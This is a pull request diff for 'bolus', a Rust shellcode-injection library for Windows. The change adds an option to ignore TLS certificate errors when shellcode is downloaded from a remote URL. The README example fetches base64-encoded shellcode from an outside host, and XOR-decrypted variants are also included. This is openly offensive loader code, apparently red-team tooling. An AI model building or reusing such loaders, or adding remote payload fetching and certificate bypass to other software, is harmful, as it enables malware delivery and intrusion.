### PR TITLE
Add HTTPS support with ability to ignore_ssl

### DIFF
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "bolus"
-version = "0.2.0"
+version = "0.3.0"
 edition = "2021"
 description = "Library for shellcode injection using the Windows API"
 authors = ["Taggart<mtaggart@taggart-tech.com"]

--- a/README.md
+++ b/README.md
@@ -23,11 +23,14 @@ use bolus::{
 const URL: &str = "http://1.2.3.4/note.txt";
 /// The # of base64 iterations to decode
 const B64_ITERATIONS: usize = 3;
+/// `IgnoreSSL` switch. You know what this does.
+const IGNORE_SSL: bool = false;
 
 fn main() -> Result<(), String> {
     let injector = load(
         InjectorType::Base64Url((
             URL.to_string(),
+            IGNORE_SSL,
             B64_ITERATIONS
         ))
     )?;
@@ -41,4 +44,4 @@ fn main() -> Result<(), String> {
 
 ## Documentation
 
-Full docs at [docs.rs](https://docs.rs/bolus/0.1.1/bolus/)
+Full docs at [docs.rs](https://docs.rs/bolus/latest/bolus/)

--- a/src/lib.rs
+++ b/src/lib.rs
@@ -34,11 +34,11 @@ pub fn load(injector_type: InjectorType) -> Result<Injector, String> {
                 shellcode: decode_b64_shellcode(&sc_bytes, b64_iterations)?,
             })
         }
-        Url(url) => Ok(Injector {
-            shellcode: download_shellcode(&url)?,
+        Url(url, ignore_ssl) => Ok(Injector {
+            shellcode: download_shellcode(&url, ignore_ssl)?,
         }),
-        Base64Url((url, b64_iterations)) => {
-            let b64_shellcode: Vec<u8> = download_shellcode(&url)?;
+        Base64Url((url, ignore_ssl, b64_iterations)) => {
+            let b64_shellcode: Vec<u8> = download_shellcode(&url, ignore_ssl)?;
             Ok(Injector {
                 shellcode: decode_b64_shellcode(&b64_shellcode, b64_iterations)?,
             })
@@ -46,8 +46,8 @@ pub fn load(injector_type: InjectorType) -> Result<Injector, String> {
         XorEmbedded((sc_bytes, key)) => Ok(Injector {
             shellcode: decrypt_xor(&sc_bytes, &key)?,
         }),
-        XorUrl((url, key)) => {
-            let sc = download_shellcode(&url)?;
+        XorUrl((url, ignore_ssl, key)) => {
+            let sc = download_shellcode(&url, ignore_ssl)?;
             Ok(Injector {
                 shellcode: decrypt_xor(&sc, &key)?,
             })


### PR DESCRIPTION
This PR adds the ability to ignore TLS certificate errors when using HTTPS with Bolus.